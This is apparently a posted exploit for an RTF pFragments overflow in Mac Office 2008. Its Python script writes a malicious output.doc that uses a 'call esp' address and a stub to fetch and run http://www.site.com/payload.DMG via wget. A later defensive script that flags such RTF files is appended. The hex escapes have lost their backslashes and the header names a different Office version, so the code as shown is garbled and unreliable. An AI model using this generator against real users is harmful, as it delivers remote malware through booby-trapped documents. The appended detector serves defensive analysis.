
Office 2008 SP0 RTF Pfragments MAC Exploit

Posted on 20 April 2012

#RTF Pfragments exploit for MAC office 2008
#Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
#Advanced Hacking Trainings - http://training.aslitsecurity.com/
#Web - http://www.aslitsecurity.com/
#Blog - http://www.aslitsecurity.blogspot.com/
#Office 2007 for MC SP 0
#!/usr/bin/python

myfile = (
"x7bx5cx72x74x66x31x7bx5cx73x68x70x7bx5cx73x70x7b"
"x5cx73x6ex20x70x46x72x61x67x6dx65x6ex74x73x7dx7b"
"x5cx73x76x20x39x3bx32x3bx31x31x31x31x31x31x31x31"
"x37x35x30x30x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32"
"f069837c" # call esp
"x31x31x31x31x31x31x31x31x31x31x31x31"
"x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31"
"x31x31x31x31x30x30x30x30x30x30x30x30x62x61x30x30"
"x30x30x35x30x30x30x36x36x38x31x63x61x66x66x30x66"
"x34x32x35x32x36x61x30x32x35x38x63x64x32x65x33x63"
"x30x35x35x61x37x34x65x66x62x38x37x30x36x39x36x65"
"x36x37x38x62x66x61x61x66x37x35x65x61x61x66x37x35"
"x65x37x35x37x63x33x7dx7dx7dx7d"
)

sign = (
"x70x69x6ex67x70x69x6ex67"
)

shellcode = "xCCxCCxCCxCC"
shellcode += "http://www.site.com/payload.DMG"
shellcode += "x11x3Ax65x89x11x3Ax65x89x11x3Ax65x89"
#("wget http://")
shellcode += "wget "
shellcode += "x1Ax18x19x02"

exploit = open("output.doc", mode="wb")
exploit.write(myfile + sign + shellcode)
print "Done"
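For triage on the defensive side, the following added example (not part of the original post) flags the two structural traits visible in the generator above: an oversized `\sv` value on a `pFragments` shape property (the name the leading bytes of `myfile` decode to) and bytes appended after the RTF's final closing brace. `MAX_SV_LEN`, the function names and both sample documents are assumptions constructed for the example.

```python
import re

MAX_SV_LEN = 64  # assumed tuning threshold for the \sv value length, not from the page

# Shape property named pFragments followed by its \sv value group.
PFRAG = re.compile(rb"\\sn\s+pFragments\s*\}\s*\{\s*\\sv\s+([^{}]*)\}", re.I)

def rtf_end(data: bytes) -> int:
    """Offset just past the brace closing the top-level group, or -1 if unbalanced."""
    depth, i = 0, 0
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":      # control word or escaped \{ \}: skip the next byte
            i += 2
            continue
        if c == b"{":
            depth += 1
        elif c == b"}":
            depth -= 1
            if depth == 0:
                return i + 1
        i += 1
    return -1

def triage(data: bytes) -> list:
    """Return human-readable findings for one file's bytes (empty list = nothing flagged)."""
    findings = []
    if not data.lstrip().startswith(b"{\\rtf"):
        return findings
    end = rtf_end(data)
    if end == -1:
        findings.append("unbalanced braces")
    elif data[end:].strip(b"\r\n\t \x00"):
        findings.append("%d bytes after final brace" % len(data[end:]))
    for m in PFRAG.finditer(data):
        if len(m.group(1)) > MAX_SV_LEN:
            findings.append("pFragments value of %d bytes" % len(m.group(1)))
    return findings

# Constructed, inert samples (no payload): a small shape and an oversized one with a tail.
BENIGN = b"{\\rtf1\\ansi{\\shp{\\sp{\\sn pFragments}{\\sv 8;1;00000000}}} hello \\{x\\}}\r\n"
SUSPECT = (b"{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv 9;2;" + b"0" * 200
           + b"}}}}" + b"MARKERMARKER" + b"\x00" * 16)

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, triage(sample))
```

The brace walker does not interpret `\bin` runs, so a file that embeds raw binary inside the RTF body can be reported as unbalanced; treat that finding as a prompt for manual review.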

 
